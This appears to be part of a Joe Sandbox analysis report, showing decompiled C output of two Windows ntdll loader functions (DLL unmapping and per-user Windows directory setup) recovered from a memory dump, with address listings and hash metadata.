                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 66%
                                                                                                                                                                                      			E1D869723(signed int __ecx, void* __edx) {
                                                                                                                                                                                      				char _v4;
                                                                                                                                                                                      				intOrPtr* _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				signed int _t60;
                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                                                      				signed int _t82;
                                                                                                                                                                                      				signed int _t83;
                                                                                                                                                                                      				intOrPtr* _t85;
                                                                                                                                                                                      				intOrPtr _t86;
                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                      				signed int* _t100;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                      				intOrPtr* _t105;
                                                                                                                                                                                      				void* _t107;
                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                      				intOrPtr* _t110;
                                                                                                                                                                                      				signed int _t112;
                                                                                                                                                                                      				signed int _t113;
                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t87 = __ecx;
                                                                                                                                                                                      				_t115 = (_t113 & 0xfffffff8) - 0x14;
                                                                                                                                                                                      				_t110 = __ecx;
                                                                                                                                                                                      				_v16 =  *[fs:0x30];
                                                                                                                                                                                      				_t82 = 0;
                                                                                                                                                                                      				_v12 = __ecx;
                                                                                                                                                                                      				_push(_t103);
                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
                                                                                                                                                                                      					L9:
                                                                                                                                                                                      					_t13 = _t110 + 0x20;
                                                                                                                                                                                      					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
                                                                                                                                                                                      					__eflags =  *_t13;
                                                                                                                                                                                      					E1D86A4E3(_t82, _t87, _t103, _t110,  *_t13);
                                                                                                                                                                                      					L10:
                                                                                                                                                                                      					__eflags =  *0x1d9365f0 - _t82; // 0x0
                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                      						_t99 =  *0x7ffe0330;
                                                                                                                                                                                      						_t83 =  *0x1d939214; // 0x0
                                                                                                                                                                                      						_t88 = 0x20;
                                                                                                                                                                                      						_t87 = _t88 - (_t99 & 0x0000001f);
                                                                                                                                                                                      						asm("ror ebx, cl");
                                                                                                                                                                                      						_t82 = _t83 ^ _t99;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					E1D84FED0(0x1d9332d8);
                                                                                                                                                                                      					_t49 =  *_t110;
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						_v20 = _t49;
                                                                                                                                                                                      						__eflags = _t49 - _t110;
                                                                                                                                                                                      						if(_t49 == _t110) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t16 = _t49 - 0x54; // 0x777c36a0
                                                                                                                                                                                      						_t108 = _t16;
                                                                                                                                                                                      						__eflags =  *(_t108 + 0x34) & 0x00000008;
                                                                                                                                                                                      						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
                                                                                                                                                                                      							_push(_t87);
                                                                                                                                                                                      							_t102 = 2;
                                                                                                                                                                                      							E1D860C2C(_t108, _t102);
                                                                                                                                                                                      							__eflags = _t82;
                                                                                                                                                                                      							if(_t82 != 0) {
                                                                                                                                                                                      								 *0x1d9391e0(_t108);
                                                                                                                                                                                      								 *_t82();
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t87 = _t108;
                                                                                                                                                                                      							E1D8498DE(_t87, 1);
                                                                                                                                                                                      							_t79 = _v24;
                                                                                                                                                                                      							__eflags =  *(_t79 + 0x68) & 0x00000100;
                                                                                                                                                                                      							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
                                                                                                                                                                                      								_t87 = _t108;
                                                                                                                                                                                      								E1D8C85AA(_t87);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags =  *0x1d9337c0 & 0x00000005;
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							_t43 = _t108 + 0x24; // -48
                                                                                                                                                                                      							E1D8BE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
                                                                                                                                                                                      							_t115 = _t115 + 0x18;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                      						_push( *((intOrPtr*)(_t108 + 0x18)));
                                                                                                                                                                                      						E1D86A390(_t82, _t87, _t108, _t110, __eflags);
                                                                                                                                                                                      						_t49 =  *_v28;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(0x1d9332d8);
                                                                                                                                                                                      					_t50 = E1D84E740(_t87);
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						L3:
                                                                                                                                                                                      						_t89 =  *(_t110 + 0x18);
                                                                                                                                                                                      						if(_t89 == 0) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t104 =  *_t89;
                                                                                                                                                                                      						__eflags = _t104 - _t89;
                                                                                                                                                                                      						if(_t104 != _t89) {
                                                                                                                                                                                      							_t50 =  *_t104;
                                                                                                                                                                                      							 *_t89 = _t50;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t32 = _t110 + 0x18;
                                                                                                                                                                                      							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
                                                                                                                                                                                      							__eflags =  *_t32;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t104;
                                                                                                                                                                                      						if(_t104 == 0) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							L1D852330(_t50, 0x1d936668);
                                                                                                                                                                                      							_t86 =  *((intOrPtr*)(_t104 + 4));
                                                                                                                                                                                      							_t35 = _t104 + 8; // 0x8
                                                                                                                                                                                      							_t100 = _t35;
                                                                                                                                                                                      							_t93 =  *(_t86 + 0x1c);
                                                                                                                                                                                      							_t60 =  *_t93;
                                                                                                                                                                                      							_v16 = _t60;
                                                                                                                                                                                      							__eflags = _t60 - _t100;
                                                                                                                                                                                      							if(_t60 == _t100) {
                                                                                                                                                                                      								L27:
                                                                                                                                                                                      								 *_t93 =  *_t100;
                                                                                                                                                                                      								__eflags =  *(_t86 + 0x1c) - _t100;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									asm("sbb eax, eax");
                                                                                                                                                                                      									_t69 =  ~(_t93 - _t100) & _t93;
                                                                                                                                                                                      									__eflags = _t69;
                                                                                                                                                                                      									 *(_t86 + 0x1c) = _t69;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_push( &_v4);
                                                                                                                                                                                      								E1D85D963(_t86, _t86, 0, _t104, _t110, __eflags);
                                                                                                                                                                                      								E1D8524D0(0x1d936668);
                                                                                                                                                                                      								__eflags = _v12;
                                                                                                                                                                                      								if(_v12 != 0) {
                                                                                                                                                                                      									E1D869723(_t86, 0);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t50 = E1D853BC0( *0x1d935d74, 0, _t104);
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t112 = _t60;
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								_t70 =  *_t112;
                                                                                                                                                                                      								_t93 = _t112;
                                                                                                                                                                                      								_t112 = _t70;
                                                                                                                                                                                      								__eflags = _t70 - _t100;
                                                                                                                                                                                      							} while (_t70 != _t100);
                                                                                                                                                                                      							_t110 = _v8;
                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t105 =  *_t110;
                                                                                                                                                                                      					 *(_t110 + 0x20) = 0xfffffffe;
                                                                                                                                                                                      					if(_t105 == _t110) {
                                                                                                                                                                                      						L8:
                                                                                                                                                                                      						return _t50;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						L5:
                                                                                                                                                                                      						_t85 =  *_t105;
                                                                                                                                                                                      						_t107 = _t105 + 0xffffffac;
                                                                                                                                                                                      						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
                                                                                                                                                                                      						E1D869938(L1D852330(_t50, 0x1d936668), _t107);
                                                                                                                                                                                      						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
                                                                                                                                                                                      							_t28 = _t107 + 0x74; // -56
                                                                                                                                                                                      							L1D869B40(_t85, _t107, _t110, 0x1d9367ac);
                                                                                                                                                                                      							_t29 = _t107 + 0x68; // -68
                                                                                                                                                                                      							L1D869B40(_t85, _t107, _t110, 0x1d9367a4);
                                                                                                                                                                                      							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E1D8524D0(0x1d936668);
                                                                                                                                                                                      						if( *0x1d935d70 != 0) {
                                                                                                                                                                                      							E1D87680F(_t107);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t50 = E1D85D3E1(_t85, _t107, _t110);
                                                                                                                                                                                      						_t105 = _t85;
                                                                                                                                                                                      					} while (_t85 != _t110);
                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                      			}








































                                                                                                                                                                                      0x1d869723
                                                                                                                                                                                      0x1d86972b
                                                                                                                                                                                      0x1d869736
                                                                                                                                                                                      0x1d869738
                                                                                                                                                                                      0x1d86973c
                                                                                                                                                                                      0x1d86973e
                                                                                                                                                                                      0x1d869742
                                                                                                                                                                                      0x1d869747
                                                                                                                                                                                      0x1d8697bc
                                                                                                                                                                                      0x1d8697bc
                                                                                                                                                                                      0x1d8697bc
                                                                                                                                                                                      0x1d8697bc
                                                                                                                                                                                      0x1d8697c0
                                                                                                                                                                                      0x1d8697c5
                                                                                                                                                                                      0x1d8697c5
                                                                                                                                                                                      0x1d8697cb
                                                                                                                                                                                      0x1d869900
                                                                                                                                                                                      0x1d869908
                                                                                                                                                                                      0x1d869913
                                                                                                                                                                                      0x1d869914
                                                                                                                                                                                      0x1d869916
                                                                                                                                                                                      0x1d869918
                                                                                                                                                                                      0x1d869918
                                                                                                                                                                                      0x1d8697d6
                                                                                                                                                                                      0x1d8697db
                                                                                                                                                                                      0x1d8697dd
                                                                                                                                                                                      0x1d8697dd
                                                                                                                                                                                      0x1d8697e1
                                                                                                                                                                                      0x1d8697e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8697e5
                                                                                                                                                                                      0x1d8697e5
                                                                                                                                                                                      0x1d8697e8
                                                                                                                                                                                      0x1d8697ec
                                                                                                                                                                                      0x1d8697ee
                                                                                                                                                                                      0x1d8697f1
                                                                                                                                                                                      0x1d8697f4
                                                                                                                                                                                      0x1d8697f9
                                                                                                                                                                                      0x1d8697fb
                                                                                                                                                                                      0x1d869922
                                                                                                                                                                                      0x1d869928
                                                                                                                                                                                      0x1d869928
                                                                                                                                                                                      0x1d869803
                                                                                                                                                                                      0x1d869805
                                                                                                                                                                                      0x1d86980a
                                                                                                                                                                                      0x1d86980e
                                                                                                                                                                                      0x1d869815
                                                                                                                                                                                      0x1d8adade
                                                                                                                                                                                      0x1d8adae0
                                                                                                                                                                                      0x1d8adae0
                                                                                                                                                                                      0x1d869815
                                                                                                                                                                                      0x1d86981b
                                                                                                                                                                                      0x1d869822
                                                                                                                                                                                      0x1d8adaea
                                                                                                                                                                                      0x1d8adb04
                                                                                                                                                                                      0x1d8adb09
                                                                                                                                                                                      0x1d8adb09
                                                                                                                                                                                      0x1d869828
                                                                                                                                                                                      0x1d86982a
                                                                                                                                                                                      0x1d86982d
                                                                                                                                                                                      0x1d869836
                                                                                                                                                                                      0x1d869836
                                                                                                                                                                                      0x1d86983a
                                                                                                                                                                                      0x1d86983f
                                                                                                                                                                                      0x1d869755
                                                                                                                                                                                      0x1d869755
                                                                                                                                                                                      0x1d869755
                                                                                                                                                                                      0x1d86975a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86986e
                                                                                                                                                                                      0x1d869870
                                                                                                                                                                                      0x1d869872
                                                                                                                                                                                      0x1d86992f
                                                                                                                                                                                      0x1d869931
                                                                                                                                                                                      0x1d869878
                                                                                                                                                                                      0x1d869878
                                                                                                                                                                                      0x1d869878
                                                                                                                                                                                      0x1d869878
                                                                                                                                                                                      0x1d869878
                                                                                                                                                                                      0x1d86987c
                                                                                                                                                                                      0x1d86987e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d869884
                                                                                                                                                                                      0x1d869889
                                                                                                                                                                                      0x1d86988e
                                                                                                                                                                                      0x1d869891
                                                                                                                                                                                      0x1d869891
                                                                                                                                                                                      0x1d869894
                                                                                                                                                                                      0x1d869897
                                                                                                                                                                                      0x1d869899
                                                                                                                                                                                      0x1d86989d
                                                                                                                                                                                      0x1d86989f
                                                                                                                                                                                      0x1d8698b1
                                                                                                                                                                                      0x1d8698b3
                                                                                                                                                                                      0x1d8698b5
                                                                                                                                                                                      0x1d8698b8
                                                                                                                                                                                      0x1d8698c0
                                                                                                                                                                                      0x1d8698c2
                                                                                                                                                                                      0x1d8698c2
                                                                                                                                                                                      0x1d8698c4
                                                                                                                                                                                      0x1d8698c4
                                                                                                                                                                                      0x1d8698cd
                                                                                                                                                                                      0x1d8698d0
                                                                                                                                                                                      0x1d8698da
                                                                                                                                                                                      0x1d8698df
                                                                                                                                                                                      0x1d8698e4
                                                                                                                                                                                      0x1d8698e8
                                                                                                                                                                                      0x1d8698e8
                                                                                                                                                                                      0x1d8698f6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8698f6
                                                                                                                                                                                      0x1d8698a1
                                                                                                                                                                                      0x1d8698a3
                                                                                                                                                                                      0x1d8698a3
                                                                                                                                                                                      0x1d8698a5
                                                                                                                                                                                      0x1d8698a7
                                                                                                                                                                                      0x1d8698a9
                                                                                                                                                                                      0x1d8698a9
                                                                                                                                                                                      0x1d8698ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8698ad
                                                                                                                                                                                      0x1d86987e
                                                                                                                                                                                      0x1d869760
                                                                                                                                                                                      0x1d869762
                                                                                                                                                                                      0x1d86976b
                                                                                                                                                                                      0x1d8697b5
                                                                                                                                                                                      0x1d8697bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86976d
                                                                                                                                                                                      0x1d86976d
                                                                                                                                                                                      0x1d86976d
                                                                                                                                                                                      0x1d86976f
                                                                                                                                                                                      0x1d869777
                                                                                                                                                                                      0x1d869782
                                                                                                                                                                                      0x1d86978b
                                                                                                                                                                                      0x1d869849
                                                                                                                                                                                      0x1d869852
                                                                                                                                                                                      0x1d869857
                                                                                                                                                                                      0x1d869860
                                                                                                                                                                                      0x1d869865
                                                                                                                                                                                      0x1d869865
                                                                                                                                                                                      0x1d869796
                                                                                                                                                                                      0x1d8697a2
                                                                                                                                                                                      0x1d8adb13
                                                                                                                                                                                      0x1d8adb13
                                                                                                                                                                                      0x1d8697aa
                                                                                                                                                                                      0x1d8697af
                                                                                                                                                                                      0x1d8697b1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86976d
                                                                                                                                                                                      0x1d86974d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d869753
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                                                      • Opcode ID: 78a88b1933e654d76f020d09a6cc8b41e1aeee8372686a0fcbb90231c71f8609
                                                                                                                                                                                      • Instruction ID: 417266dd4fb2eb53577fe555efcc3b79832ea53ea6f13a294d0158f676ab910d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 78a88b1933e654d76f020d09a6cc8b41e1aeee8372686a0fcbb90231c71f8609
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9651F375608302ABC711EF3DC884BB977A1BB84734F15462DF5559B2E2EB30A844CBA3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                                                      			E1D87C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				char _v544;
                                                                                                                                                                                      				char _v552;
                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                      				char* _v560;
                                                                                                                                                                                      				short _v562;
                                                                                                                                                                                      				signed int _v564;
                                                                                                                                                                                      				short _v570;
                                                                                                                                                                                      				char _v572;
                                                                                                                                                                                      				signed int _v580;
                                                                                                                                                                                      				char _v588;
                                                                                                                                                                                      				signed int _v604;
                                                                                                                                                                                      				signed short _v608;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                      				signed int* _t27;
                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                      				signed int _t42;
                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                      				signed char _t56;
                                                                                                                                                                                      				signed int* _t58;
                                                                                                                                                                                      				intOrPtr* _t65;
                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                      				signed int _t80;
                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                      				signed int _t85;
                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t70 = __edx;
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_t72 = __ecx;
                                                                                                                                                                                      				_t25 = E1D860130();
                                                                                                                                                                                      				if(_t25 != 0) {
                                                                                                                                                                                      					L1D852330(_t25, 0x1d935b5c);
                                                                                                                                                                                      					_t27 =  *0x1d939224; // 0x0
                                                                                                                                                                                      					_t75 =  *_t27;
                                                                                                                                                                                      					__eflags = _t72;
                                                                                                                                                                                      					if(_t72 != 0) {
                                                                                                                                                                                      						__eflags = _t75;
                                                                                                                                                                                      						if(_t75 == 0) {
                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t80 = _t75 - 1;
                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eflags = _t75;
                                                                                                                                                                                      						if(_t75 == 0) {
                                                                                                                                                                                      							E1D839050( *0x1d93921c, _t75);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                      							L13:
                                                                                                                                                                                      							E1D8524D0(0x1d935b5c);
                                                                                                                                                                                      							_t65 = 0xe;
                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                      							_t87 = (_t85 & 0xfffffff8) - 0x224;
                                                                                                                                                                                      							_v20 =  *0x1d93b370 ^ _t87;
                                                                                                                                                                                      							_t76 = _t65;
                                                                                                                                                                                      							 *0x1d9391e0( &_v544, 0x104, _t75, _t82);
                                                                                                                                                                                      							_t67 =  *_t65() + _t33;
                                                                                                                                                                                      							__eflags = _t67;
                                                                                                                                                                                      							if(_t67 != 0) {
                                                                                                                                                                                      								__eflags =  *0x1d93660c;
                                                                                                                                                                                      								_v560 =  &_v552;
                                                                                                                                                                                      								_v564 = _t67;
                                                                                                                                                                                      								_v562 = 0x208;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									L25:
                                                                                                                                                                                      									_push( &_v556);
                                                                                                                                                                                      									_push( &_v564);
                                                                                                                                                                                      									E1D8CCB20(0x1d935b5c, _t72, _t76, __eflags);
                                                                                                                                                                                      									goto L15;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t76 = ( *0x1d936608 & 0x0000ffff) + 2 + _t67;
                                                                                                                                                                                      									_t42 = E1D855D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
                                                                                                                                                                                      									_v580 = _t42;
                                                                                                                                                                                      									__eflags = _t42;
                                                                                                                                                                                      									if(_t42 != 0) {
                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                      										_v570 = _t76;
                                                                                                                                                                                      										_v572 = 0;
                                                                                                                                                                                      										E1D8610D0(_t67,  &_v572, 0x1d936608);
                                                                                                                                                                                      										E1D8610D0(_t67,  &_v580,  &_v572);
                                                                                                                                                                                      										E1D84FE40(_t67,  &_v588, ";");
                                                                                                                                                                                      										E1D853BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d93660c);
                                                                                                                                                                                      										 *0x1d936608 = _v608;
                                                                                                                                                                                      										_t54 = _v604;
                                                                                                                                                                                      										 *0x1d93660c = _t54;
                                                                                                                                                                                      										 *0x1d936604 = _t54;
                                                                                                                                                                                      										E1D8CD4A0(_t67, __eflags);
                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t56 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      										__eflags = _t56 & 0x00000003;
                                                                                                                                                                                      										if((_t56 & 0x00000003) != 0) {
                                                                                                                                                                                      											_push("Failed to reallocate the system dirs string !\n");
                                                                                                                                                                                      											_push(0);
                                                                                                                                                                                      											_push("LdrpInitializePerUserWindowsDirectory");
                                                                                                                                                                                      											_push(0xcf4);
                                                                                                                                                                                      											_push("minkernel\\ntdll\\ldrinit.c");
                                                                                                                                                                                      											E1D8BE692();
                                                                                                                                                                                      											_t56 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      											_t87 = _t87 + 0x14;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eflags = _t56 & 0x00000010;
                                                                                                                                                                                      										if((_t56 & 0x00000010) != 0) {
                                                                                                                                                                                      											asm("int3");
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t39 = 0xc0000017;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L15:
                                                                                                                                                                                      								_t39 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_pop(_t77);
                                                                                                                                                                                      							__eflags = _v36 ^ _t87;
                                                                                                                                                                                      							return E1D884B50(_t39, 0x1d935b5c, _v36 ^ _t87, _t70, _t72, _t77);
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t80 = _t75 + 1;
                                                                                                                                                                                      							__eflags = _t80;
                                                                                                                                                                                      							L7:
                                                                                                                                                                                      							_t58 =  *0x1d939224; // 0x0
                                                                                                                                                                                      							 *_t58 = _t80;
                                                                                                                                                                                      							__eflags = _t72;
                                                                                                                                                                                      							if(_t72 != 0) {
                                                                                                                                                                                      								__eflags = _t80;
                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                      									E1D839050( *0x1d93921c, 1);
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t25 = E1D8524D0(0x1d935b5c);
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}




































                                                                                                                                                                                      0x1d87c640
                                                                                                                                                                                      0x1d87c642
                                                                                                                                                                                      0x1d87c644
                                                                                                                                                                                      0x1d87c645
                                                                                                                                                                                      0x1d87c647
                                                                                                                                                                                      0x1d87c64e
                                                                                                                                                                                      0x1d87c65a
                                                                                                                                                                                      0x1d87c65f
                                                                                                                                                                                      0x1d87c664
                                                                                                                                                                                      0x1d87c666
                                                                                                                                                                                      0x1d87c668
                                                                                                                                                                                      0x1d87c6a4
                                                                                                                                                                                      0x1d87c6a6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d87c6a8
                                                                                                                                                                                      0x1d87c6a8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d87c6a8
                                                                                                                                                                                      0x1d87c66a
                                                                                                                                                                                      0x1d87c66a
                                                                                                                                                                                      0x1d87c66c
                                                                                                                                                                                      0x1d87c675
                                                                                                                                                                                      0x1d87c675
                                                                                                                                                                                      0x1d87c67a
                                                                                                                                                                                      0x1d87c67d
                                                                                                                                                                                      0x1d87c6ab
                                                                                                                                                                                      0x1d87c6ac
                                                                                                                                                                                      0x1d87c6b3
                                                                                                                                                                                      0x1d87c6b4
                                                                                                                                                                                      0x1d87c6be
                                                                                                                                                                                      0x1d87c6cb
                                                                                                                                                                                      0x1d87c6dc
                                                                                                                                                                                      0x1d87c6df
                                                                                                                                                                                      0x1d87c6e9
                                                                                                                                                                                      0x1d87c6e9
                                                                                                                                                                                      0x1d87c6eb
                                                                                                                                                                                      0x1d8b8090
                                                                                                                                                                                      0x1d8b809b
                                                                                                                                                                                      0x1d8b80a4
                                                                                                                                                                                      0x1d8b80a9
                                                                                                                                                                                      0x1d8b80ae
                                                                                                                                                                                      0x1d8b817f
                                                                                                                                                                                      0x1d8b8183
                                                                                                                                                                                      0x1d8b8188
                                                                                                                                                                                      0x1d8b8189
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b80b4
                                                                                                                                                                                      0x1d8b80c4
                                                                                                                                                                                      0x1d8b80cc
                                                                                                                                                                                      0x1d8b80d1
                                                                                                                                                                                      0x1d8b80d5
                                                                                                                                                                                      0x1d8b80d7
                                                                                                                                                                                      0x1d8b8114
                                                                                                                                                                                      0x1d8b8116
                                                                                                                                                                                      0x1d8b811b
                                                                                                                                                                                      0x1d8b812a
                                                                                                                                                                                      0x1d8b8139
                                                                                                                                                                                      0x1d8b8148
                                                                                                                                                                                      0x1d8b815e
                                                                                                                                                                                      0x1d8b8167
                                                                                                                                                                                      0x1d8b816c
                                                                                                                                                                                      0x1d8b8170
                                                                                                                                                                                      0x1d8b8175
                                                                                                                                                                                      0x1d8b817a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b80d9
                                                                                                                                                                                      0x1d8b80d9
                                                                                                                                                                                      0x1d8b80de
                                                                                                                                                                                      0x1d8b80e0
                                                                                                                                                                                      0x1d8b80e2
                                                                                                                                                                                      0x1d8b80e7
                                                                                                                                                                                      0x1d8b80e9
                                                                                                                                                                                      0x1d8b80ee
                                                                                                                                                                                      0x1d8b80f3
                                                                                                                                                                                      0x1d8b80f8
                                                                                                                                                                                      0x1d8b80fd
                                                                                                                                                                                      0x1d8b8102
                                                                                                                                                                                      0x1d8b8102
                                                                                                                                                                                      0x1d8b8105
                                                                                                                                                                                      0x1d8b8107
                                                                                                                                                                                      0x1d8b8109
                                                                                                                                                                                      0x1d8b8109
                                                                                                                                                                                      0x1d8b810a
                                                                                                                                                                                      0x1d8b810a
                                                                                                                                                                                      0x1d8b80d7
                                                                                                                                                                                      0x1d87c6f1
                                                                                                                                                                                      0x1d87c6f1
                                                                                                                                                                                      0x1d87c6f1
                                                                                                                                                                                      0x1d87c6f1
                                                                                                                                                                                      0x1d87c6f1
                                                                                                                                                                                      0x1d87c6fa
                                                                                                                                                                                      0x1d87c6fb
                                                                                                                                                                                      0x1d87c705
                                                                                                                                                                                      0x1d87c67f
                                                                                                                                                                                      0x1d87c67f
                                                                                                                                                                                      0x1d87c67f
